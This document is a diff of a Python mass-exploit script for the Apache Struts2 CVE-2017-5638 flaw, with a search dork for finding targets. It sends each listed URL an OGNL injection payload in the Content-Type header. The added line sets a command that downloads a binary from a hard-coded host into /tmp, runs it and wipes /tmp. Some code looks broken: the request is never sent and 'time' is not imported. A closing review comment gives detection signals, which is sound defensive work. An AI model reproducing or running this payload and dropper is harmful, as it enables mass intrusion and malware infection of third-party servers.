1
#!/usr/bin/python
2
# Modded Apache Struts2 RCE Exploit v2 CVE-2017-5638 AUTO EXPLOITER | By; LiGhT
3
# Dork: "site:com filetype:action"
4
# site example^: org,net,egu,gov,io,pw
5
6
import urllib2
7
import httplib
8
import sys, re, os
9
from threading import Thread 
10
11
strutz = open(sys.argv[1], "r").readlines()
12-
cmd = "" # COMMAND HERE Arch(s): x86, i686
12+
cmd = "cd /tmp ; wget http://1.1.1.1/kys7t ; chmod 777 kys7t ; ./kys7t ; rm -rf /tmp/*" # COMMAND HERE Arch(s): x86, i686
13
14
def exploit(url, cmd):
15
	#page = ''
16
	payload = "%{(#_='multipart/form-data')."
17
	payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
18
	payload += "(#_memberAccess?"
19
	payload += "(#_memberAccess=#dm):"
20
	payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
21
	payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
22
	payload += "(#ognlUtil.getExcludedPackageNames().clear())."
23
	payload += "(#ognlUtil.getExcludedClasses().clear())."
24
	payload += "(#context.setMemberAccess(#dm))))."
25
	payload += "(#cmd='%s')." % cmd
26
	payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
27
	payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
28
	payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
29
	payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
30
	payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
31
	payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
32
	payload += "(#ros.flush())}"
33
	try:
34
		url = ''.join(url)
35
		if "http://" not in url:
36
			url = "http://"+url
37
		elif "https://" in url:
38
			url = url.replace("https://", "http://")
39
	   	headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
40
	   	request = urllib2.Request(url, headers=headers)
41
		print "\033[32mPayload Sent!"
42
	   	#page = urllib2.urlopen(request).read()
43
	except httplib.IncompleteRead, e:
44
		pass
45
	except KeyboardInterrupt:
46
		pass
47
	except Exception:
48
		pass
49
	#print "\n\033[35m%s"%(page)
50
 
51
 
52
for url in strutz:
53
	try:
54
		l33t = Thread(target=exploit, args=(url,cmd,))
55
		l33t.start()
56
		time.sleep(0.09)
57
	except:
58
		pass
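Review bot: The value placed in `cmd` on the new line 12 is a fixed staging command (fetch from a hard-coded host into `/tmp`, `chmod 777`, execute, then `rm -rf /tmp/*`), so it is a concrete indicator of compromise rather than a configurable setting, and should be catalogued as such. From a detection standpoint the stable signals on this page are the request's `Content-Type` header beginning with the OGNL prefix `%{(#_='multipart/form-data')` (built in `exploit`) and a `wget`→`chmod 777`→execute chain rooted in `/tmp`; both are what Struts front-end and endpoint telemetry should alert on. The trailing `rm -rf /tmp/*` is also anti-forensic: responders handling a host hit by this variant should not expect the dropped file to survive and should rely on web-server access logs, proxy logs and process-creation telemetry instead. Note for triage that the script's main loop is a bare `except: pass` around a threaded call, so one run can fan out across every line of the input file without any output on failure.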